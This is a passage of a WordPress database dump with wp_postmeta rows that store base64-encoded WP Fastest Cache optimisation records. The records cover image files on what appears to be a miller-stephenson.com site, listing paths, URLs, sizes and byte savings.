mFja3VwXC8yMDE2XC8wOVwvc2hpZWxkc3lzLTItZTE0NzM3ODk0OTc5OTMtMzQweDE5OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjgxMjQsImlkIjoxNjE3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NoaWVsZHN5cy0yLWUxNDczNzg5NDk3OTkzLTI1MHgxOTguanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoxOTgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2hpZWxkc3lzLTItZTE0NzM3ODk0OTc5OTMtMjUweDE5OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9zaGllbGRzeXMtMi1lMTQ3Mzc4OTQ5Nzk5My0yNTB4MTk4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2ODEyNiwiaWQiOjE2MTd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2hpZWxkc3lzLTItZTE0NzM3ODk0OTc5OTMtMjAweDE5OC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjE5OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zaGllbGRzeXMtMi1lMTQ3Mzc4OTQ5Nzk5My0yMDB4MTk4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3NoaWVsZHN5cy0yLWUxNDczNzg5NDk3OTkzLTIwMHgxOTguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4MTI4LCJpZCI6MTYxN30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zaGllbGRzeXMtMi1lMTQ3Mzc4OTQ5Nzk5My0yMjV4MTk4LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MTk4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NoaWVsZHN5cy0yLWUxNDczNzg5NDk3OTkzLTIyNXgxOTguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvc2hpZWxkc3lzLTItZTE0NzM3ODk0OTc5OTMtMjI1eDE5OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjgxMzAsImlkIjoxNjE3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2hpZWxkc3lzLTItZTE0NzM3ODk0OTc5OTMtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zaGllbGRzeXMtMi1lMTQ3Mzc4OTQ5Nzk5My0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3NoaWVsZHN5cy0yLWUxNDczNzg5NDk3OTkzLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjo0MSwidGltZSI6MTQ4MzU2ODEzMiwiaWQiOjE2MTd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zaGllbGRzeXMtMi1lMTQ3Mzc4OTQ5Nzk5My0zMDB4MTk4LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NoaWVsZHN5cy0yLWUxNDczNzg5NDk3OTkzLTMwMHgxOTguanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIxOTgiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvc2hpZWxkc3lzLTItZTE0NzM3ODk0OTc5OTMtMzAweDE5OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjgxMzUsImlkIjoxNjE3fV0='); 
INSERT INTO `wp_postmeta` VALUES (29384, 1614, 'wpfc_optimisation_reduction', '1370'); 
INSERT INTO `wp_postmeta` VALUES (29385, 1614, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtdGVzdC1lMTQ3Mzc4NzQ4OTcxNi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLXRlc3QtZTE0NzM3ODc0ODk3MTYuanBnIiwid2lkdGgiOjQ4MCwiaGVpZ2h0IjoxOTgsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy10ZXN0LWUxNDczNzg3NDg5NzE2LmpwZyIsInJlZHVjdGlvbiI6MTMyMCwidGltZSI6MTQ4MzU2ODE0MSwiaWQiOiIxNjE0In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy10ZXN0LWUxNDczNzg3NDg5NzE2LTM0MHgxOTguanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjoxOTgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtdGVzdC1lMTQ3Mzc4NzQ4OTcxNi0zNDB4MTk4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLXRlc3QtZTE0NzM3ODc0ODk3MTYtMzQweDE5OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjgxNDMsImlkIjoxNjE0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLXRlc3QtZTE0NzM3ODc0ODk3MTYtMjUweDE5OC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjE5OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy10ZXN0LWUxNDczNzg3NDg5NzE2LTI1MHgxOTguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtdGVzdC1lMTQ3Mzc4NzQ4OTcxNi0yNTB4MTk4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2ODE0NSwiaWQiOjE2MTR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtdGVzdC1lMTQ3Mzc4NzQ4OTcxNi0yMDB4MTk4LmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MTk4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLXRlc3QtZTE0NzM3ODc0ODk3MTYtMjAweDE5OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy10ZXN0LWUxNDczNzg3NDg5NzE2LTIwMHgxOTguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4MTQ3LCJpZCI6MTYxNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy10ZXN0LWUxNDczNzg3NDg5NzE2LTIyNXgxOTguanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoxOTgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtdGVzdC1lMTQ3Mzc4NzQ4OTcxNi0yMjV4MTk4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLXRlc3QtZTE0NzM3ODc0ODk3MTYtMjI1eDE5OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjgxNDksImlkIjoxNjE0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtdGVzdC1lMTQ3Mzc4NzQ4OTcxNi0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLXRlc3QtZTE0NzM3ODc0ODk3MTYtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy10ZXN0LWUxNDczNzg3NDg5NzE2LTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjo0NSwidGltZSI6MTQ4MzU2ODE1MSwiaWQiOjE2MTR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy10ZXN0LWUxNDczNzg3NDg5NzE2LTMwMHgxOTguanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtdGVzdC1lMTQ3Mzc4NzQ4OTcxNi0zMDB4MTk4LmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMTk4IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLXRlc3QtZTE0NzM3ODc0ODk3MTYtMzAweDE5OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjgxNTMsImlkIjoxNjE0fV0='); 
INSERT INTO `wp_postmeta` VALUES (29386, 1606, 'wpfc_optimisation_reduction', '10216'); 
INSERT INTO `wp_postmeta` VALUES (29387, 1606, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVkFaTy1GUlMtYXJ0aWNsZS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1ZBWk8tRlJTLWFydGljbGUuanBnIiwid2lkdGgiOjQ4MDAsImhlaWdodCI6MzIwMCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU2ODE1OCwiaWQiOiIxNjA2In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9WQVpPLUZSUy1hcnRpY2xlLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVkFaTy1GUlMtYXJ0aWNsZS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1ZBWk8tRlJTLWFydGljbGUtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjYyMiwidGltZSI6MTQ4MzU2ODE2MSwiaWQiOjE2MDZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVkFaTy1GUlMtYXJ0aWNsZS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1ZBWk8tRlJTLWFydGljbGUtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9WQVpPLUZSUy1hcnRpY2xlLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxMDc3LCJ0aW1lIjoxNDgzNTY4MTY1LCJpZCI6MTYwNn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9WQVpPLUZSUy1hcnRpY2xlLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVkFaTy1GUlMtYXJ0aWNsZS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1ZBWk8tRlJTLWFydGljbGUtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjk3NiwidGltZSI6MTQ4MzU2ODE2OSwiaWQiOjE2MDZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVkFaTy1GUlMtYXJ0aWNsZS0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9WQVpPLUZSUy1hcnRpY2xlLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9WQVpPLUZSUy1hcnRpY2xlLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjI3MzEsInRpbWUiOjE0ODM1NjgxNzQsImlkIjoxNjA2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1ZBWk8tRlJTLWFydGljbGUtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9WQVpPLUZSUy1hcnRpY2xlLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVkFaTy1GUlMtYXJ0aWNsZS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NjMzLCJ0aW1lIjoxNDgzNTY4MTc4LCJpZCI6MTYwNn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9WQVpPLUZSUy1hcnRpY2xlLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVkFaTy1GUlMtYXJ0aWNsZS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1ZBWk8tRlJTLWFydGljbGUtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjUwNSwidGltZSI6MTQ4MzU2ODE4MSwiaWQiOjE2MDZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVkFaTy1GUlMtYXJ0aWNsZS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1ZBWk8tRlJTLWFydGljbGUtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9WQVpPLUZSUy1hcnRpY2xlLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1MzQsInRpbWUiOjE0ODM1NjgxODUsImlkIjoxNjA2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1ZBWk8tRlJTLWFydGljbGUtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9WQVpPLUZSUy1hcnRpY2xlLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVkFaTy1GUlMtYXJ0aWNsZS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6NzM5LCJ0aW1lIjoxNDgzNTY4MTg5LCJpZCI6MTYwNn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1ZBWk8tRlJTLWFydGljbGUtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9WQVpPLUZSUy1hcnRpY2xlLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVkFaTy1GUlMtYXJ0aWNsZS0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6NjA4LCJ0aW1lIjoxNDgzNTY4MTkyLCJpZCI6MTYwNn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1ZBWk8tRlJTLWFydGljbGUtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9WQVpPLUZSUy1hcnRpY2xlLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVkFaTy1GUlMtYXJ0aWNsZS0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6ODc5LCJ0aW1lIjoxNDgzNTY4MTk1LCJpZCI6MTYwNn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1ZBWk8tRlJTLWFydGljbGUtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9WQVpPLUZSUy1hcnRpY2xlLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVkFaTy1GUlMtYXJ0aWNsZS0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6OTEyLCJ0aW1lIjoxNDgzNTY4MTk5LCJpZCI6MTYwNn1d'); 
INSERT INTO `wp_postmeta` VALUES (29388, 1600, 'wpfc_optimisation_reduction', '13527'); 
INSERT INTO `wp_postmeta` VALUES (29389, 1600, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02NC0yLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02NC0yLmpwZyIsIndpZHRoIjo1NjE2LCJoZWlnaHQiOjM3NDQsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NjgyMDQsImlkIjoiMTYwMCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02NC0yLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02NC0yLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy02NC0yLTM0MHgzNDAuanBnIiw